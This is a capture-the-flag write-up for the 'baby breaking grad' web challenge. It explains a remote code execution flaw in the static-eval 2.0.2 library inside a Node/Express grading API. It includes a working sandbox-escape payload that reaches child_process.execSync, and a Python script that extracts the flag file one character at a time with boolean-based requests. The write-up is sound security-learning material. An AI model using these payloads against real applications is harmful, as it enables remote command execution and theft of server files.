
baby breaking grad

Challenge description

We corrected the math in our physics teacher’s paper and now he is failing us out of spite for making a fool out of him in the university’s research symposium, now we can’t graduate, unless we can do something about it…

Looking around

When we visit the website in a browser, we see this.


Functionally, that’s it. Choose a name and not pass.

Challenge source code


const randomize         = require('randomatic');
const path              = require('path');
const express           = require('express');
const router            = express.Router();
const StudentHelper     = require('../helpers/StudentHelper');

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));

router.post('/api/calculate', (req, res) => {
    let student = req.body;

    if (student.name === undefined) {
        return res.send({
            error: 'Specify student name'

    let formula = student.formula || '[0.20 * assignment + 0.25 * exam + 0.25 * paper]';

    if (StudentHelper.isDumb(student.name) || !StudentHelper.hasPassed(student, formula)) {
        return res.send({
            'pass': 'n' + randomize('?', 10, {chars: 'o0'}) + 'pe'

    return res.send({
        'pass': 'Passed'

module.exports = router;


const evaluate = require('static-eval');
const parse = require('esprima').parse;

module.exports = {
        return (name.includes('Baker') || name.includes('Purvis'));

    hasPassed({ exam, paper, assignment }, formula) {
        let ast = parse(formula).body[0].expression;
        let weight = evaluate(ast, { exam, paper, assignment });
        return parseFloat(weight) >= parseFloat(10.5);


/api/calculate call is used to determine if we pass or not. When we intercept the request we can see that we are only sending the name.

{"name":"Kenny Baker"}

We can also specify the formula. If we don’t specify it, it gets decided for us. We can make ourselves pass if we don’t include Baker or Purvis in the name and specify the formula above 10.5.


In StudentHelper we use the module static-eval which can evaluate code blocks. From package.json we see static-eval is at the version 2.0.2.

There is an issue within this version, where we can trigger an RCE. The issue is debated here.

let ast = parse(formula).body[0].expression;
let weight = evaluate(ast, { exam, paper, assignment });

In this secion the program parses content in our controlled formula variable.


As a basis we are going to use this payload.

payload = "(function (x) { return `${eval(\"console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())\")}` })()"

On the server this executes ls command. My approach is boolean-based. We can control the formula to either pass or no pass. I will exfiltrate flag char by char by bruteforcing every character in the flag. If I guess the char correctly, I pass, if not, I don’t pass.

The flag file is named flag + 5 random characters that we don’t know. cat flag* does the trick and concatenates the right file.



import requests
import string

url = ''

flag = ''

for i, _ in enumerate(iter(bool, True)):
  for c in string.printable:
    # if char from flag is guessed correctly, return 25 (Passed: formula >= 10.5) else return 1 (Nope: formula < 10.5)
    p = "(function (x) { return `${eval(\"if(global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString().charCodeAt(" + str(i) + ") == " + str(ord(c)) + ") {25} else {1}\")}` })()"

    j = {"name": "yooo", "formula": p}
    r = requests.post(url + '/api/calculate', json=j)

    if(b'Passed' in r.content):
      flag += c

      if(c == '}'):


I compared charCodeAt with the ord of my charset, because it was much more reliable for me than comparing literal characters.


